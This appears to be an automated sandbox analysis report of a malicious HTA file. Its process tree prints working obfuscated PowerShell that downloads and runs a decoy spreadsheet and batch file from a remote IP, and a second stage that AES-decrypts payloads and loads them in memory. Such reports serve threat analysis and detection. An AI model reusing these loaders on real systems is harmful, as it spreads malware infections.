Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 01:20

General

  • Target

    44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta

  • Size

    13KB

  • MD5

    9f587ac1e364bc4b89ea9991c780b09a

  • SHA1

    9612509e53fde418c7bb1794ac5f30c894b960a9

  • SHA256

    44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384

  • SHA512

    bcc6c0e3a765cc57fb2d75b5761175d3608befacb5d1b2d478d6e2ddcfa415b0afdf93299ecaff18c6d2de3b135f1ab6b2b2670f20668e3df73c2b679610feb3

  • SSDEEP

    384:qpzWNjCBvB7owyK5GYsx5GlUi5GhmPM5GmmaUi5Gt48FR:scYZkYK0qmPM9mYl83

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1540
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){[IO.File]::WriteAllBytes($SBAMeJuWZ, $CZAXshoWnad)};function qHQDgYXJPBUhEu($SBAMeJuWZ){if($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42965,42973,42973))) -eq $True){rundll32.exe $SBAMeJuWZ }elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42977,42980,42914))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $SBAMeJuWZ}elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42974,42980,42970))) -eq $True){misexec /qn /i $SBAMeJuWZ}else{Start-Process $SBAMeJuWZ}};function cCwKlxfFlkHXisv($cfRvnDevIseAZkkGCdZE){$ByCevDdKwarCKLMHmQl = New-Object (NPsijwhhOlDHomDMYu @(42943,42966,42981,42911,42952,42966,42963,42932,42973,42970,42966,42975,42981));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CZAXshoWnad = $ByCevDdKwarCKLMHmQl.DownloadData($cfRvnDevIseAZkkGCdZE);return $CZAXshoWnad};function NPsijwhhOlDHomDMYu($ryHnSGx){$GVAeEuIntdcnz=42865;$kZTyiBcpN=$Null;foreach($YdUlriGuLkXxwHJSV in $ryHnSGx){$kZTyiBcpN+=[char]($YdUlriGuLkXxwHJSV-$GVAeEuIntdcnz)};return $kZTyiBcpN};function wtXSieyRAReJE(){$QeIsxXKSCag = $env:AppData + '\';$KPbdZNmFeRGIPHxzICPT = $QeIsxXKSCag + 'PurchaseDB.xlsx';If(Test-Path -Path $KPbdZNmFeRGIPHxzICPT){Invoke-Item $KPbdZNmFeRGIPHxzICPT;}Else{ $HXoxLKEOLYWMiHWXK = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42945,42982,42979,42964,42969,42962,42980,42966,42933,42931,42911,42985,42973,42980,42985));ekAviDgm $KPbdZNmFeRGIPHxzICPT $HXoxLKEOLYWMiHWXK;Invoke-Item $KPbdZNmFeRGIPHxzICPT;};$GLzOZefB = $QeIsxXKSCag + 'gogis.bat'; if (Test-Path -Path $GLzOZefB){qHQDgYXJPBUhEu $GLzOZefB;}Else{ $PmRVpFoXv = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42968,42976,42968,42970,42980,42911,42963,42962,42981));ekAviDgm $GLzOZefB $PmRVpFoXv;qHQDgYXJPBUhEu $GLzOZefB;};;;;}wtXSieyRAReJE;
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
        "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
        3⤵
        • Enumerates system info in registry
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        PID:2360
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2644
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
            5⤵
              PID:1604
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1564

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      69B

      MD5

      b0d440b42ef7a9fb656558f1f223406f

      SHA1

      956adad06004786a421399e2373af317af6a9965

      SHA256

      04af0729f2429990ae63ee91a506ca6629e6b4288789f051258bf8f8200cfc7a

      SHA512

      5e135780537714fed829f13d7941d853fa2de7343d857e21df4e39f8ad5e2dd5e75b1b87e686cf01633f95e3af76d501c5bd9eb54cba69834c1429a84454481d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      2ebad88bb9b0e2d4f90007ca3bbd47a8

      SHA1

      248ec0cf4abce8196fcd49b3a5f2fc26099c6b06

      SHA256

      b1ddbcb3cadea771e22ab62de579cb6aad96b1fcc5bc5b9b4ea9150ae5bbc441

      SHA512

      bb296cb45fa656cda29cd9e74759d8810137ad0111f88d96d071ad981e49be7fb93c69d77ea3cab28dd1cb3eb5ebcff3179d3ab47a8ffac38c4bc77899d77de4

    • C:\Users\Admin\AppData\Roaming\PurchaseDB.xlsx

      Filesize

      12KB

      MD5

      05eb4338ab9bcd275b88d8f2f701fea8

      SHA1

      409e23bd1603cb69b7511a497483011005b9fdaf

      SHA256

      b829611b9cb65f7baad3c897689d2c06cd457d294b072c48de79da471b986802

      SHA512

      8f651aff4e2d6581913da2ab419213e71e1b88fa4cb7ab0853e5e0720308e4a4f86707d1aa1c457e3aed8046aba3647d7b8260472ddd6a34f7719f43a6855ced

    • C:\Users\Admin\AppData\Roaming\gogis.bat

      Filesize

      6.9MB

      MD5

      a65e873839228c5b453d6effa5d14d16

      SHA1

      40be429e0e6b41061f3291d10e720eaebf32eda1

      SHA256

      59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951

      SHA512

      84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850

    • memory/1564-45-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-52-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-51-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-50-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-49-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/1564-47-0x0000000002C00000-0x0000000002C40000-memory.dmp

      Filesize

      256KB

    • memory/1564-46-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/1564-44-0x00000000722F0000-0x000000007289B000-memory.dmp

      Filesize

      5.7MB

    • memory/2360-8-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2360-48-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2360-7-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2360-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2360-57-0x000000006DE0D000-0x000000006DE18000-memory.dmp

      Filesize

      44KB

    • memory/2536-28-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-2-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-5-0x0000000001BF0000-0x0000000001C30000-memory.dmp

      Filesize

      256KB

    • memory/2536-4-0x0000000072BE0000-0x000000007318B000-memory.dmp

      Filesize

      5.7MB

    • memory/2536-3-0x0000000001BF0000-0x0000000001C30000-memory.dmp

      Filesize

      256KB